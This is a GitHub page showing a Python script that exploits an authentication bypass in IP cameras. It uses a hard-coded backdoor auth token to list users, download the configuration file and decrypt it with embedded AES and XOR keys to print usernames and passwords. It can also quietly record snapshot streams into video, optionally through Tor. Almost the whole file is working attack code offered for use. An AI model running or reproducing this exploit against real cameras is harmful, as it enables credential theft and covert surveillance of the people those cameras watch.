-
Notifications
You must be signed in to change notification settings - Fork 0
/
script.py
263 lines (202 loc) · 8.5 KB
/
script.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
import requests
import os
import struct
import sys
import time
import cv2
import numpy as np
from datetime import datetime
from skimage.metrics import structural_similarity as compare_ssim
# List of all users and their roles:
# http://camera.ip/Security/users?auth=YWRtaW46MTEK
# Camera snapshot:
# http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
# Camera configuration:
# http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
def usage():
    """Print the command-line synopsis to stdout and exit with status 1."""
    synopsis = "Usage: script.py -p|-s|-c IP:PORT [-t] [-r REFRESH_TIME]"
    print(synopsis)
    # Equivalent to sys.exit(1): both raise SystemExit with code 1.
    raise SystemExit(1)
def log_error(error_message):
    """Print ``error_message`` to stdout, prefixed with the local time.

    The output line has the form ``[YYYY-MM-DD HH:MM:SS] <message>``.

    Args:
        error_message: Text (or any formattable object) to report.
    """
    timestamp = format(datetime.now(), '%Y-%m-%d %H:%M:%S')
    print("[{}] {}".format(timestamp, error_message))
def denoise_image(img):
    """Denoise an image with OpenCV non-local means, scaled by image area.

    The filter strength and the two window sizes start from the baseline
    values 30, 7 and 21 and are multiplied by the image's pixel count
    relative to a 1280x720 frame.

    Args:
        img: Image array. Only ``img.shape[:2]`` (height, width) is read
            here; the array itself is passed to
            ``cv2.fastNlMeansDenoising`` unchanged.

    Returns:
        The array returned by ``cv2.fastNlMeansDenoising``.
    """
    height, width = img.shape[:2]
    scale_factor = (height * width) / (1280 * 720)

    def _odd_window(base):
        # On small frames int() truncates the scaled size to 0; clamp to 1.
        # OpenCV documents both window sizes as "should be odd", so an even
        # result is bumped to the next odd value.
        size = max(1, int(base * scale_factor))
        return size if size % 2 else size + 1

    # A strength of 0 would make the filter's weighting degenerate, so keep
    # it at least 1 for very small frames.
    h_for_denoising = max(1, int(30 * scale_factor))
    return cv2.fastNlMeansDenoising(
        img, None, h_for_denoising, _odd_window(7), _odd_window(21)
    )
def are_images_similar(img1, img2, threshold=0.99):
    """Return whether two images are structurally similar after denoising.

    Both images are passed through ``denoise_image`` and compared with
    SSIM (``compare_ssim``); they count as similar when the mean SSIM is at
    least ``threshold``.

    Args:
        img1: First image array.
        img2: Second image array.
        threshold: Minimum SSIM value for the images to count as similar.

    Returns:
        A truthy value when the SSIM score reaches ``threshold``; ``False``
        when the two arrays do not have the same shape.
    """
    # SSIM needs equally-shaped inputs and raises otherwise. Frames of
    # different dimensions cannot be duplicates, so report "not similar"
    # instead of letting the exception reach the caller.
    if img1.shape != img2.shape:
        return False
    img1 = denoise_image(img1)
    img2 = denoise_image(img2)
    # Only the mean score is needed, so the full per-pixel SSIM map
    # (full=True) is not requested.
    ssim_value = compare_ssim(img1, img2)
    return ssim_value >= threshold
def decrypt_with_openssl(data):
    """Pipe ``data`` through ``openssl enc -d -aes-128-ecb`` and return stdout.

    The ``openssl`` executable is invoked with a fixed hex key, no salt and
    ``-md md5``. Its stderr output and exit status are not inspected.

    Args:
        data: Bytes written to the process's standard input.

    Returns:
        The bytes the process wrote to standard output.
    """
    import subprocess

    command = [
        "openssl", "enc", "-d", "-aes-128-ecb",
        "-K", "279977f62f6cfd2d91cd75b889ce0c9a",
        "-nosalt", "-md", "md5"
    ]
    completed = subprocess.run(
        command,
        input=data,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    return completed.stdout
def check_tor():
    """Check that an HTTP request succeeds through the local SOCKS proxy.

    Issues a GET to ``http://httpbin.org/ip`` via
    ``socks5h://127.0.0.1:9050`` with a 10-second timeout. The response
    body and status code are not examined.

    Returns:
        ``True`` if the request completed without a ``RequestException``;
        ``False`` otherwise (the error is reported through ``log_error``).
    """
    socks_proxy = 'socks5h://127.0.0.1:9050'
    try:
        requests.get(
            "http://httpbin.org/ip",
            proxies={'http': socks_proxy, 'https': socks_proxy},
            timeout=10,
        )
    except requests.RequestException as e:
        log_error(f"Error checking Tor: {e}")
        return False
    return True
def images_to_video(img_folder, output_video):
    """Assemble the ``.jpg`` files of a folder into a 1-fps ``mp4v`` video.

    Files are taken in sorted file-name order. The frame size of the video
    is taken from the first image that can be read.

    Args:
        img_folder: Directory containing the ``.jpg`` frames.
        output_video: Path of the video file to write.

    Raises:
        ValueError: If the folder contains no ``.jpg`` file, or none of
            them could be read as an image.
    """
    image_names = sorted(
        name for name in os.listdir(img_folder) if name.endswith(".jpg")
    )
    if not image_names:
        raise ValueError(f"No .jpg images found in {img_folder}")

    writer = None
    try:
        for name in image_names:
            frame = cv2.imread(os.path.join(img_folder, name))
            if frame is None:
                # cv2.imread signals an unreadable/corrupt file with None;
                # skip it rather than crash on frame.shape / write().
                continue
            if writer is None:
                # Open the writer lazily so the size comes from the first
                # frame that actually decoded.
                height, width = frame.shape[:2]
                writer = cv2.VideoWriter(
                    output_video,
                    cv2.VideoWriter_fourcc(*'mp4v'),
                    1,
                    (width, height),
                )
            writer.write(frame)
    finally:
        # Always finalize the container, even if a write fails midway.
        if writer is not None:
            writer.release()

    if writer is None:
        raise ValueError(f"No readable .jpg images found in {img_folder}")
def get_users_list(ip, port, proxies):
    """Return the user names listed by the device's ``/Security/users`` page.

    The response is parsed as XML only when the status code is 200 and the
    body contains ``<UserList``. The XML namespace is taken from the root
    tag and each ``User`` element's ``userName`` text is collected.

    Args:
        ip: Host part of the device address.
        port: Port part of the device address.
        proxies: ``requests``-style proxy mapping (may be empty).

    Returns:
        A list of user names. Any exception is reported through
        ``log_error`` and whatever was collected up to that point is
        returned (possibly an empty list).
    """
    usernames = []
    try:
        from xml.etree import ElementTree as ET

        endpoint = f"http://{ip}:{port}/Security/users?auth=YWRtaW46MTEK"
        reply = requests.get(endpoint, proxies=proxies)
        if reply.status_code != 200 or "<UserList" not in reply.text:
            return usernames
        tree_root = ET.fromstring(reply.text)
        # The root tag looks like "{namespace}UserList"; keep the namespace.
        ns = tree_root.tag.split('}')[0].strip('{')
        for node in tree_root.findall(f"{{{ns}}}User"):
            usernames.append(node.find(f"{{{ns}}}userName").text)
    except Exception as e:
        log_error(f"Error fetching user list: {e}")
    return usernames
def find_user_credentials(xor_output, users):
    """Collect the NUL-delimited field that follows each user name.

    For every occurrence of an encoded user name in ``xor_output``, any
    run of ``0x00`` bytes after it is skipped and the following run of
    non-zero bytes is decoded (undecodable bytes ignored) and recorded.

    Args:
        xor_output: ``bytes``/``bytearray`` buffer to scan.
        users: Iterable of user-name strings to look for.

    Returns:
        Dict mapping each user name that occurred to the list of decoded
        fields, in order of occurrence. If ``'admin'`` has more than one
        entry, entries equal to ``'12345'`` are removed from its list.
    """
    total = len(xor_output)
    found = {}
    for name in users:
        needle = name.encode()
        cursor = xor_output.find(needle, 0)
        while cursor != -1:
            cursor += len(needle)
            # Skip the zero padding between the name and the next field.
            while cursor < total and xor_output[cursor] == 0x00:
                cursor += 1
            begin = cursor
            # The field runs up to the next zero byte (or end of buffer).
            while cursor < total and xor_output[cursor] != 0x00:
                cursor += 1
            field = xor_output[begin:cursor].decode(errors='ignore')
            found.setdefault(name, []).append(field)
            cursor = xor_output.find(needle, cursor)

    admin_entries = found.get('admin')
    if admin_entries is not None and len(admin_entries) > 1:
        found['admin'] = [entry for entry in admin_entries if entry != '12345']
    return found
def main():
    """Command-line entry point: dispatch on the first argument.

    ``sys.argv[1]`` selects the mode and ``sys.argv[2]`` is ``IP:PORT``:

    * ``-p``: fetch the user list and configuration file, decrypt/XOR the
      configuration and print ``user:field`` pairs found in it.
    * ``-s``: poll the snapshot URL in a loop and save frames that differ
      from the last saved one under ``snapshots/<ip>:<port>/``.
    * ``-c``: build ``snapshots/<ip>_<port>.mp4`` from the saved frames.

    ``-t`` routes requests through the local SOCKS proxy after
    ``check_tor`` succeeds; ``-r N`` sets the polling interval for ``-s``.

    NOTE(review): every request carries a hard-coded ``auth`` query token;
    run this only against devices you are authorized to test.
    NOTE(review): the source this was recovered from had lost its
    indentation; nesting below was reconstructed from syntax - confirm
    against the original file, especially inside the ``-s`` loop.
    """
    # NOTE(review): per the usage string, "-r N" without "-t" gives 5
    # arguments, which this check rejects - confirm whether 5 should be
    # accepted.
    if len(sys.argv) not in [3, 4, 6]:
        usage()
    option = sys.argv[1]
    # Raises ValueError if the argument does not contain exactly one ":".
    ip, port = sys.argv[2].split(":")
    use_tor = False
    if '-t' in sys.argv:
        if not check_tor():
            print("Tor doesn't seem to be running or there's a problem with the connection. Exiting.")
            sys.exit(1)
        use_tor = True
    # Empty mapping means requests connects directly.
    proxies = {
        'http': 'socks5h://127.0.0.1:9050',
        'https': 'socks5h://127.0.0.1:9050'
    } if use_tor else {}
    if option == '-p':
        try:
            users = get_users_list(ip, port, proxies)
            if not users:
                # An empty user list is reported as "not vulnerable".
                ip_port = f"{ip}:{port}"
                print(f"{ip_port.ljust(24)}Camera is not vulnerable.")
                sys.exit(0)
            url = f"http://{ip}:{port}/System/configurationFile?auth=YWRtaW46MTEK"
            response = requests.get(url, proxies=proxies)
            decrypted_output = decrypt_with_openssl(response.content)
            # Repeating 4-byte XOR key applied over the decrypted bytes.
            key = bytes([0x73, 0x8B, 0x55, 0x44])
            xor_output = bytearray()
            for i in range(len(decrypted_output)):
                xor_output.append(decrypted_output[i] ^ key[i % len(key)])
            credentials = find_user_credentials(xor_output, users)
            if credentials:
                for user, passwords in credentials.items():
                    for password in passwords:
                        # One line per pair, address padded to 24 columns.
                        ip_port = f"{ip}:{port}"
                        formatted_output = ip_port.ljust(24) + f"{user}:{password}"
                        print(formatted_output)
        except requests.RequestException as e:
            log_error(f"Error fetching configuration file: {e}")
    elif option == '-s':
        duplicate_wait_time = 600  # seconds; matches the "10 minutes" message below
        duplicate_counter = 0
        refresh_time = 5  # default seconds between polls
        if '-r' in sys.argv:
            try:
                refresh_time_index = sys.argv.index('-r') + 1
                refresh_time = int(sys.argv[refresh_time_index])
            except (ValueError, IndexError):
                print("Invalid refresh time provided. Exiting.")
                sys.exit(1)
        if not os.path.exists("snapshots"):
            os.mkdir("snapshots")
        directory = os.path.join("snapshots", f"{ip}:{port}")
        if not os.path.exists(directory):
            os.mkdir(directory)
        counter = 0
        last_saved_img_matrix = None
        try:
            while True:
                response = requests.get(f"http://{ip}:{port}/onvif-http/snapshot?auth=YWRtaW46MTEK", proxies=proxies)
                if len(response.content) == 0:
                    print(f"Warning: Received an empty image from {ip}:{port}. Skipping this frame.")
                    # NOTE(review): this retries immediately, without the
                    # refresh_time sleep at the bottom of the loop.
                    continue
                # NOTE(review): the decode result is not checked before use;
                # presumably cv2.imdecode yields None for undecodable data -
                # verify and guard if so.
                current_img_matrix = cv2.imdecode(np.frombuffer(response.content, np.uint8), cv2.IMREAD_GRAYSCALE)
                if counter == 0 or (last_saved_img_matrix is None) or not are_images_similar(last_saved_img_matrix, current_img_matrix):
                    # File name is a timestamp truncated to milliseconds.
                    filename = datetime.now().strftime("%Y%m%d_%H%M%S%f")[:-3] + ".jpg"
                    file_path = os.path.join(directory, filename)
                    with open(file_path, "wb") as file:
                        file.write(response.content)
                    last_saved_img_matrix = current_img_matrix
                    duplicate_counter = 0
                else:
                    duplicate_counter += 1
                    # duplicate_counter is reset to 0 on every other path, so
                    # after the increment this condition holds each time.
                    if duplicate_counter >= 1:
                        print("Duplicate image detected. Waiting 10 minutes before the next request...")
                        time.sleep(duplicate_wait_time)
                        duplicate_counter = 0
                        continue
                    # NOTE(review): appears unreachable given the branch
                    # above (assuming this nesting is right) - confirm.
                    counter -= 1
                counter += 1
                time.sleep(refresh_time)
        except KeyboardInterrupt:
            print("Stopped by user.")
        except requests.RequestException as e:
            log_error(f"Error fetching snapshot: {e}")
    elif option == '-c':
        directory = os.path.join("snapshots", f"{ip}:{port}")
        if not os.path.exists(directory):
            print(f"No images found for {ip}:{port}")
            sys.exit(1)
        output_video = os.path.join("snapshots", f"{ip}_{port}.mp4")
        images_to_video(directory, output_video)
        print(f"Video saved as {output_video}")
    else:
        usage()
# Run the command-line interface only when executed as a script.
if __name__ == "__main__":
    main()